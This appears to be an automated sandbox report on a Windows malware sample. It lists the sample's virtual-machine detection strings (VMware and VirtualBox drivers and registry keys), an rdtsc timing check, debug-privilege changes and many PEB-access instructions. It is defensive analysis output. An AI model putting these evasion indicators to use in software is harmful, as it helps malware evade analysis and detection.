Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.519486009.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000004.00000000.484031457.0000000006915000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: explorer.exe, 00000004.00000000.490087729.00000000080B1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: explorer.exe, 00000004.00000000.520685059.00000000081F4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATAX
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000004.00000000.519486009.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe

Code function: 3_2_00408EE0 rdtsc

3_2_00408EE0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342DB40 mov eax, dword ptr fs:[00000030h]	3_2_0342DB40
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F8B58 mov eax, dword ptr fs:[00000030h]	3_2_034F8B58
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342F358 mov eax, dword ptr fs:[00000030h]	3_2_0342F358
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342DB60 mov ecx, dword ptr fs:[00000030h]	3_2_0342DB60
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03453B7A mov eax, dword ptr fs:[00000030h]	3_2_03453B7A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03453B7A mov eax, dword ptr fs:[00000030h]	3_2_03453B7A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E131B mov eax, dword ptr fs:[00000030h]	3_2_034E131B
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A53CA mov eax, dword ptr fs:[00000030h]	3_2_034A53CA
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A53CA mov eax, dword ptr fs:[00000030h]	3_2_034A53CA
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]	3_2_034503E2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]	3_2_034503E2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]	3_2_034503E2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]	3_2_034503E2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]	3_2_034503E2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]	3_2_034503E2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344DBE9 mov eax, dword ptr fs:[00000030h]	3_2_0344DBE9
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E138A mov eax, dword ptr fs:[00000030h]	3_2_034E138A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03431B8F mov eax, dword ptr fs:[00000030h]	3_2_03431B8F
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03431B8F mov eax, dword ptr fs:[00000030h]	3_2_03431B8F
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034DD380 mov ecx, dword ptr fs:[00000030h]	3_2_034DD380
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452397 mov eax, dword ptr fs:[00000030h]	3_2_03452397
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345B390 mov eax, dword ptr fs:[00000030h]	3_2_0345B390
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03454BAD mov eax, dword ptr fs:[00000030h]	3_2_03454BAD
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03454BAD mov eax, dword ptr fs:[00000030h]	3_2_03454BAD
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03454BAD mov eax, dword ptr fs:[00000030h]	3_2_03454BAD
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F5BA5 mov eax, dword ptr fs:[00000030h]	3_2_034F5BA5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03429240 mov eax, dword ptr fs:[00000030h]	3_2_03429240
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03429240 mov eax, dword ptr fs:[00000030h]	3_2_03429240
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03429240 mov eax, dword ptr fs:[00000030h]	3_2_03429240
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03429240 mov eax, dword ptr fs:[00000030h]	3_2_03429240
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EEA55 mov eax, dword ptr fs:[00000030h]	3_2_034EEA55
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034B4257 mov eax, dword ptr fs:[00000030h]	3_2_034B4257
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034DB260 mov eax, dword ptr fs:[00000030h]	3_2_034DB260
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034DB260 mov eax, dword ptr fs:[00000030h]	3_2_034DB260
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F8A62 mov eax, dword ptr fs:[00000030h]	3_2_034F8A62
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0346927A mov eax, dword ptr fs:[00000030h]	3_2_0346927A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03438A0A mov eax, dword ptr fs:[00000030h]	3_2_03438A0A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03425210 mov eax, dword ptr fs:[00000030h]	3_2_03425210
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03425210 mov ecx, dword ptr fs:[00000030h]	3_2_03425210
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03425210 mov eax, dword ptr fs:[00000030h]	3_2_03425210
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03425210 mov eax, dword ptr fs:[00000030h]	3_2_03425210
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342AA16 mov eax, dword ptr fs:[00000030h]	3_2_0342AA16
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342AA16 mov eax, dword ptr fs:[00000030h]	3_2_0342AA16
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03443A1C mov eax, dword ptr fs:[00000030h]	3_2_03443A1C
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EAA16 mov eax, dword ptr fs:[00000030h]	3_2_034EAA16
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EAA16 mov eax, dword ptr fs:[00000030h]	3_2_034EAA16
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03464A2C mov eax, dword ptr fs:[00000030h]	3_2_03464A2C
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03464A2C mov eax, dword ptr fs:[00000030h]	3_2_03464A2C
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452ACB mov eax, dword ptr fs:[00000030h]	3_2_03452ACB
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452AE4 mov eax, dword ptr fs:[00000030h]	3_2_03452AE4
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345D294 mov eax, dword ptr fs:[00000030h]	3_2_0345D294
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345D294 mov eax, dword ptr fs:[00000030h]	3_2_0345D294
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]	3_2_034252A5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]	3_2_034252A5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]	3_2_034252A5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]	3_2_034252A5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]	3_2_034252A5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0343AAB0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0343AAB0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345FAB0 mov eax, dword ptr fs:[00000030h]	3_2_0345FAB0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344B944 mov eax, dword ptr fs:[00000030h]	3_2_0344B944
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344B944 mov eax, dword ptr fs:[00000030h]	3_2_0344B944
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342C962 mov eax, dword ptr fs:[00000030h]	3_2_0342C962
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342B171 mov eax, dword ptr fs:[00000030h]	3_2_0342B171
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342B171 mov eax, dword ptr fs:[00000030h]	3_2_0342B171
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03429100 mov eax, dword ptr fs:[00000030h]	3_2_03429100
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03429100 mov eax, dword ptr fs:[00000030h]	3_2_03429100
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03429100 mov eax, dword ptr fs:[00000030h]	3_2_03429100
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03444120 mov eax, dword ptr fs:[00000030h]	3_2_03444120
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03444120 mov eax, dword ptr fs:[00000030h]	3_2_03444120
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03444120 mov eax, dword ptr fs:[00000030h]	3_2_03444120
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03444120 mov eax, dword ptr fs:[00000030h]	3_2_03444120
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03444120 mov ecx, dword ptr fs:[00000030h]	3_2_03444120
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345513A mov eax, dword ptr fs:[00000030h]	3_2_0345513A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345513A mov eax, dword ptr fs:[00000030h]	3_2_0345513A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0342B1E1
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0342B1E1
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0342B1E1
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034B41E8 mov eax, dword ptr fs:[00000030h]	3_2_034B41E8
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345A185 mov eax, dword ptr fs:[00000030h]	3_2_0345A185
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344C182 mov eax, dword ptr fs:[00000030h]	3_2_0344C182
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452990 mov eax, dword ptr fs:[00000030h]	3_2_03452990
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034561A0 mov eax, dword ptr fs:[00000030h]	3_2_034561A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034561A0 mov eax, dword ptr fs:[00000030h]	3_2_034561A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A69A6 mov eax, dword ptr fs:[00000030h]	3_2_034A69A6
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A51BE mov eax, dword ptr fs:[00000030h]	3_2_034A51BE
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A51BE mov eax, dword ptr fs:[00000030h]	3_2_034A51BE
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A51BE mov eax, dword ptr fs:[00000030h]	3_2_034A51BE
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A51BE mov eax, dword ptr fs:[00000030h]	3_2_034A51BE
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03440050 mov eax, dword ptr fs:[00000030h]	3_2_03440050
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03440050 mov eax, dword ptr fs:[00000030h]	3_2_03440050
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F1074 mov eax, dword ptr fs:[00000030h]	3_2_034F1074
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E2073 mov eax, dword ptr fs:[00000030h]	3_2_034E2073
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F4015 mov eax, dword ptr fs:[00000030h]	3_2_034F4015
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F4015 mov eax, dword ptr fs:[00000030h]	3_2_034F4015
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A7016 mov eax, dword ptr fs:[00000030h]	3_2_034A7016
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A7016 mov eax, dword ptr fs:[00000030h]	3_2_034A7016
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A7016 mov eax, dword ptr fs:[00000030h]	3_2_034A7016
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]	3_2_0345002D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]	3_2_0345002D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]	3_2_0345002D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]	3_2_0345002D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]	3_2_0345002D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343B02A mov eax, dword ptr fs:[00000030h]	3_2_0343B02A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343B02A mov eax, dword ptr fs:[00000030h]	3_2_0343B02A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343B02A mov eax, dword ptr fs:[00000030h]	3_2_0343B02A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343B02A mov eax, dword ptr fs:[00000030h]	3_2_0343B02A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	3_2_034BB8D0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BB8D0 mov ecx, dword ptr fs:[00000030h]	3_2_034BB8D0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	3_2_034BB8D0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	3_2_034BB8D0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	3_2_034BB8D0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	3_2_034BB8D0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034258EC mov eax, dword ptr fs:[00000030h]	3_2_034258EC
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03429080 mov eax, dword ptr fs:[00000030h]	3_2_03429080
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A3884 mov eax, dword ptr fs:[00000030h]	3_2_034A3884
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A3884 mov eax, dword ptr fs:[00000030h]	3_2_034A3884
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]	3_2_034520A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]	3_2_034520A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]	3_2_034520A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]	3_2_034520A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]	3_2_034520A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]	3_2_034520A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034690AF mov eax, dword ptr fs:[00000030h]	3_2_034690AF
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345F0BF mov ecx, dword ptr fs:[00000030h]	3_2_0345F0BF
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345F0BF mov eax, dword ptr fs:[00000030h]	3_2_0345F0BF
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345F0BF mov eax, dword ptr fs:[00000030h]	3_2_0345F0BF
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343EF40 mov eax, dword ptr fs:[00000030h]	3_2_0343EF40
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343FF60 mov eax, dword ptr fs:[00000030h]	3_2_0343FF60
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F8F6A mov eax, dword ptr fs:[00000030h]	3_2_034F8F6A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F070D mov eax, dword ptr fs:[00000030h]	3_2_034F070D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F070D mov eax, dword ptr fs:[00000030h]	3_2_034F070D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345A70E mov eax, dword ptr fs:[00000030h]	3_2_0345A70E
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345A70E mov eax, dword ptr fs:[00000030h]	3_2_0345A70E
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344F716 mov eax, dword ptr fs:[00000030h]	3_2_0344F716
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BFF10 mov eax, dword ptr fs:[00000030h]	3_2_034BFF10
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BFF10 mov eax, dword ptr fs:[00000030h]	3_2_034BFF10
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03424F2E mov eax, dword ptr fs:[00000030h]	3_2_03424F2E
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03424F2E mov eax, dword ptr fs:[00000030h]	3_2_03424F2E
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345E730 mov eax, dword ptr fs:[00000030h]	3_2_0345E730
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034637F5 mov eax, dword ptr fs:[00000030h]	3_2_034637F5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03438794 mov eax, dword ptr fs:[00000030h]	3_2_03438794
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A7794 mov eax, dword ptr fs:[00000030h]	3_2_034A7794
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A7794 mov eax, dword ptr fs:[00000030h]	3_2_034A7794
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A7794 mov eax, dword ptr fs:[00000030h]	3_2_034A7794
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]	3_2_03437E41
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]	3_2_03437E41
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]	3_2_03437E41
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]	3_2_03437E41
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]	3_2_03437E41
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]	3_2_03437E41
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EAE44 mov eax, dword ptr fs:[00000030h]	3_2_034EAE44
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EAE44 mov eax, dword ptr fs:[00000030h]	3_2_034EAE44
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343766D mov eax, dword ptr fs:[00000030h]	3_2_0343766D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]	3_2_0344AE73
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]	3_2_0344AE73
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]	3_2_0344AE73
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]	3_2_0344AE73
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]	3_2_0344AE73
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342C600 mov eax, dword ptr fs:[00000030h]	3_2_0342C600
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342C600 mov eax, dword ptr fs:[00000030h]	3_2_0342C600
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342C600 mov eax, dword ptr fs:[00000030h]	3_2_0342C600
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03458E00 mov eax, dword ptr fs:[00000030h]	3_2_03458E00
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1608 mov eax, dword ptr fs:[00000030h]	3_2_034E1608
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345A61C mov eax, dword ptr fs:[00000030h]	3_2_0345A61C
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345A61C mov eax, dword ptr fs:[00000030h]	3_2_0345A61C
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342E620 mov eax, dword ptr fs:[00000030h]	3_2_0342E620
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034DFE3F mov eax, dword ptr fs:[00000030h]	3_2_034DFE3F
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03468EC7 mov eax, dword ptr fs:[00000030h]	3_2_03468EC7
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034536CC mov eax, dword ptr fs:[00000030h]	3_2_034536CC
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034DFEC0 mov eax, dword ptr fs:[00000030h]	3_2_034DFEC0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F8ED6 mov eax, dword ptr fs:[00000030h]	3_2_034F8ED6
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034376E2 mov eax, dword ptr fs:[00000030h]	3_2_034376E2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034516E0 mov ecx, dword ptr fs:[00000030h]	3_2_034516E0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BFE87 mov eax, dword ptr fs:[00000030h]	3_2_034BFE87
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F0EA5 mov eax, dword ptr fs:[00000030h]	3_2_034F0EA5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F0EA5 mov eax, dword ptr fs:[00000030h]	3_2_034F0EA5
